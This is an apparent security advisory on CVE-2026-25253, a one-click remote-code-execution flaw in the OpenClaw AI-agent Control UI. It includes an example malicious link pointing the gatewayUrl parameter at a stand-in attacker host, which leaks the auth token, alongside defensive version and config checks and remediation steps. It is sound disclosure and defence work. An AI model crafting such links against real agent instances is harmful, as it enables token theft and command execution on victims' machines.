---
id: 2026-01-openclaw-cve-2026-25253-gatewayurl-rce
title: "OpenClaw 1-click RCE via WebSocket gateway-URL token theft (CVE-2026-25253, Jan 2026)"
date_disclosed: 2026-01-26
last_updated: 2026-05-29
severity: critical
status: patched
ecosystems: [ai-agents, openclaw]
tools_affected: [openclaw, clawdbot, moltbot]
tags: [cve, openclaw, websocket, token-theft, one-click-rce, gatewayurl, ai-agent]
---

## TL;DR
**CVE-2026-25253** (CVSS 8.8, CWE-669 Incorrect Resource Transfer Between Spheres) — OpenClaw's Control UI blindly trusted the `gatewayUrl` query-string parameter in browser links. A single malicious link in the victim's browser silently pointed the OpenClaw client at an attacker-controlled WebSocket gateway, which captured the auth token and ran arbitrary commands on the victim's machine with the agent's full system privileges. **No authentication, no user interaction beyond a click.** Disclosed 2026-01-26; OpenClaw shipped 2026.1.29 the same week with a confirmation modal (full origin-validation later). Distinct from the May 2026 [Claw Chain cluster (CVE-2026-44112/-44113/-44115/-44118)](2026-05-openclaw-claw-chain.md) — different bug, different month, different researcher — but the same lesson: OpenClaw's open-by-default deployment posture turns every dev box into a network service.

## What happened
OpenClaw (formerly Clawdbot/Moltbot) ships a browser-based Control UI that connects to a WebSocket gateway on `localhost`. The UI's `applySettingsFromUrl()` function read a `gatewayUrl` parameter directly from the page URL and applied it without origin-validation, allowlisting, or scheme restrictions ([SonicWall](https://www.sonicwall.com/blog/openclaw-auth-token-theft-leading-to-rce-cve-2026-25253), [Foresiet](https://foresiet.com/blog/cve-2026-25253-openclaw-rce-fix/), [Hive Pro](https://hivepro.com/threat-advisory/one-click-to-compromise-inside-openclaws-critical-rce-flaw/)).

A single crafted link of the form `http://localhost:<port>/?gatewayUrl=wss://attacker.example/` did three things in sequence:
1. The victim's browser, loading the link, set OpenClaw's gateway to the attacker's WebSocket endpoint.
2. The Control UI then sent its **auth token** to the attacker's gateway as part of the normal connect handshake.
3. With the token in hand, the attacker spoke the OpenClaw protocol back to the victim's instance and **executed arbitrary shell commands** with the agent's privileges ([SOCRadar](https://socradar.io/blog/cve-2026-25253-rce-openclaw-auth-token/), [Penligent](https://www.penligent.ai/hackinglabs/cve-2026-25253-openclaw-bug-enables-one-click-remote-code-execution-via-malicious-link/)).

The attack defeats the standard "binds to localhost so it's safe" assumption: the victim's *own browser* — which trivially reaches localhost — is the network attacker. PoC exploits are public ([Hackers Arise](https://hackers-arise.com/cve-2026-25253-how-malicious-links-can-steal-authentication-tokens-and-compromise-openclaw-ai-systems/), [SmartTech247](https://www.smarttech247.com/threat-intel-reports/critical-openclaw-vulnerability-allows-1-click-remote-code-execution)).

## Exposure scale at disclosure
By February 2026, scans on Shodan/Censys/ZoomEye saw **~135,000 — 245,000 publicly accessible OpenClaw instances** (numbers vary by scanner), the majority unauthenticated ([The Hacker News](https://thehackernews.com/2026/02/openclaw-bug-enables-one-click-remote.html), [runZero](https://www.runzero.com/blog/openclaw/), [Cybersecurity News](https://cybersecuritynews.com/openclaw-chain-vulnerabilities/)). Even instances behind a NAT were exploitable via this bug because the attack ran from the victim's *browser*, not from the network.

## Am I affected?

```bash
# Check installed OpenClaw version
openclaw --version 2>/dev/null

# Vulnerable: any version < 2026.1.29
# Patched: 2026.1.29 and later
```

If you ran OpenClaw < 2026.1.29 and ever clicked a link in a browser session that could reach `localhost`, treat the instance as compromised. Look for unfamiliar gateway URLs or modified auth tokens:

```bash
# Common config locations — check for gateway URLs you didn't set
cat ~/.openclaw/config.yaml 2>/dev/null | grep -iE 'gateway|wss?://'
cat ~/.openclaw/settings.json 2>/dev/null | grep -iE 'gateway|wss?://'

# Audit any cron/launchd entries OpenClaw planted
crontab -l 2>/dev/null | grep -iE 'openclaw|claw'
```

## If you are affected
1. **Upgrade to OpenClaw ≥ 2026.1.29** (also closes the [later Claw Chain CVEs](2026-05-openclaw-claw-chain.md) when you reach 2026.4.22).
2. **Regenerate the OpenClaw auth token.** The original is compromised even if you can't see specific abuse.
3. **Rotate every credential the agent had reachable.** Per Hive Pro: API keys for messaging platforms (Slack, Discord, Telegram), cloud providers (AWS, GCP, Azure), and any other integrated service.
4. **Reimage the host** if you have any reason to suspect commands were executed — token theft + RCE means persistence may be in place.
5. **Don't expose OpenClaw to the public internet.** The localhost-only assumption was always wrong; treat the Control UI like an admin panel and put it behind SSO or a tunnel.

## Prevention
→ [prevention/agent-sandboxing.md](../prevention/agent-sandboxing.md)
→ [prevention/mcp-hygiene.md](../prevention/mcp-hygiene.md)

**Pattern to internalize:** any local agent UI that accepts configuration from the URL it was loaded with is one bookmark away from this class of attack. The fix isn't a confirmation modal — it's never reading security-critical config from an attacker-influenced surface. Cross-origin requests against `localhost` are *not* blocked by browsers; treat localhost as a public network whenever an attacker can deliver a link.

## Sources
- [The Hacker News — OpenClaw Bug Enables One-Click Remote Code Execution via Malicious Link](https://thehackernews.com/2026/02/openclaw-bug-enables-one-click-remote.html)
- [SonicWall — OpenClaw Auth Token Theft Leading to RCE: CVE-2026-25253](https://www.sonicwall.com/blog/openclaw-auth-token-theft-leading-to-rce-cve-2026-25253)
- [Hive Pro — One Click to Compromise: Inside OpenClaw's Critical RCE Flaw](https://hivepro.com/threat-advisory/one-click-to-compromise-inside-openclaws-critical-rce-flaw/)
- [Foresiet — CVE-2026-25253: OpenClaw 1-Click RCE Vulnerability Guide](https://foresiet.com/blog/cve-2026-25253-openclaw-rce-fix/)
- [SOCRadar — CVE-2026-25253: 1-Click RCE in OpenClaw Through Auth Token Exfiltration](https://socradar.io/blog/cve-2026-25253-rce-openclaw-auth-token/)
- [Penligent — CVE-2026-25253: OpenClaw 1-Click RCE via Malicious Link](https://www.penligent.ai/hackinglabs/cve-2026-25253-openclaw-bug-enables-one-click-remote-code-execution-via-malicious-link/)
- [ProArch — OpenClaw RCE Vulnerability (CVE-2026-25253): One-Click Attack & Fix](https://www.proarch.com/blog/threats-vulnerabilities/openclaw-rce-vulnerability-cve-2026-25253)
- [runZero — OpenClaw RCE vulnerability: CVE-2026-25253](https://www.runzero.com/blog/openclaw/)
- [Hackers Arise — CVE-2026-25253: How Malicious Links Can Steal Authentication Tokens and Compromise OpenClaw AI Systems](https://hackers-arise.com/cve-2026-25253-how-malicious-links-can-steal-authentication-tokens-and-compromise-openclaw-ai-systems/)
- [SmartTech247 — Critical OpenClaw Vulnerability Allows 1-Click Remote Code Execution](https://www.smarttech247.com/threat-intel-reports/critical-openclaw-vulnerability-allows-1-click-remote-code-execution)
- [NVD — CVE-2026-25253 detail](https://nvd.nist.gov/vuln/detail/CVE-2026-25253)
- [Signal Cage — OpenClaw Security Crisis: 135,000 Exposed Instances and Active Infostealer Campaigns — February 2026](https://signalcage.com/artificial-intelligence/2026/17/20/openclaw-security-crisis-135000-exposed-instances-and-active-infostealer-campaigns-february-2026/)
